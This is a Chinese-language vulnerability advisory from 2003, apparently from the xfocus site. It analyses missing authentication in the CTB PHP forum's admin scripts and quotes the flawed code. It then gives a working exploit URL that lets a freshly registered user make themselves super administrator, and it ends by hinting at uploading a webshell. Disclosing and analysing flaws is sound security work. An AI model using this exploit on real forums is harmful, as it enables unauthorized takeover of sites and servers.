xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
添加文章 English Version
 文章分类 
 文章推荐 
LSD RPC 溢出漏洞之分析
任意用户模式下执行 ring 0 代码
IIS的NSIISLOG.DLL溢出问题分析

漂亮但不安全的CTB


创建时间:2003-05-13
文章属性:原创
文章提交:PsKey (PsKey_at_hotmail.com)

PsKey<PsKey@hotmail.com>
http://analysist.tocare.net  C4ST<China4lert Security Team>
http://www.isgrey.com

>>>Dedicated This Scrap To CaoJing<<<

涉及版本:
^^^^^^^^^^
目前所有版本(现在1.3Alpha为最高版本)

描述:
^^^^^^
CTB是一款由实易数码<www.11cn.org>开发和维护的源代码开放的PHP论坛。由于其后台管理文件验证存在缺陷,可能导致非法用户直接添加论坛超级管理员,进而威胁论坛或服务器安全。

具体:
^^^^^^
CTB书写非常规范,代码井然有序,赏心悦目,的确是优美的程序;特别是其功能模块,着实让小弟学习了一把。但安全方面却令人堪忧:
试看如下代码:
/admin/main.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  //获取get变量
    if( is_array($_GET) ) {
        foreach($_GET as $k=>$v) {
            if( is_array( $_GET[$k]) ) {
                foreach($_GET[$k] as $k2=>$v2) {
                    $return[$k][$k2] = $v2;
                }
            } else {
                $return[$k] = $v;
            }
        }
}
...
$mod = isset($_GET['mod']) ? $_GET['mod'] : $_POST['mod'];
    if (!file_exists($mod.".php")) {
        $mod = "mainright";
    }
    require_once ($mod.".php");

    //-----------------------------------------------------------------------------
    //初始化类变量
    $ctb = new Module;
    $ctb->set = $set;
    $ctb->tplPath = "./templates";
    $ctb->input = $return;
    $ctb->sess = isset($_COOKIE["sess_adminname"]) ? $_COOKIE : $_SESSION;
    $ctb->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
这里没有任何验证,我们看看添加管理员的文件:
/admin/systemuser.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
class Module extends CommonClass
//系统管理模块子类
{
    function execute() {
        switch($this->input['action']) {
...
case 'addSystemUser':
                $this->addSystemUser();
                break;
...
     }    
    }
function addSystemUser()
{
    //输入数据简单格式化
    $this->inputCheck("main.php?mod=systemuser&action=showSystemUser");
    //执行添加操作
    $this->file = "../".$this->set[dataPath]."/users/list.php";
    $systemLine = $this->select(4, $this->input['systemUserName']);
....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
依然没有验证,一路顺利啊!

利用方法:
^^^^^^^^^^
先注册一个用户:
登陆ID:  cat
用户名 :   dog
密码:      ilikecat
重复密码:  ilikecat
信箱:      cat@dog.com
接着提交如下URL:

http://www.target.com/ctb/admin/main.php?mod=systemuser&systemUserName=dog&systemUserMode=1&action=addSystemUser

哈哈,你现在已经是超级管理员了,不相信?提交如下URL后台登陆:

http://www.psych.com/ctb/admin/main.php?mod=login

管理名称:  cat
管理密码:  ilikecat

咦...还真成功了!

你现在是不是想更改后台上传文件类型,然后upload webshell?哼,被我猜到了吧...

后记:另外发现CTB代码注释有些扎眼的错别字,大煞风景,希望可以一起修正。
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved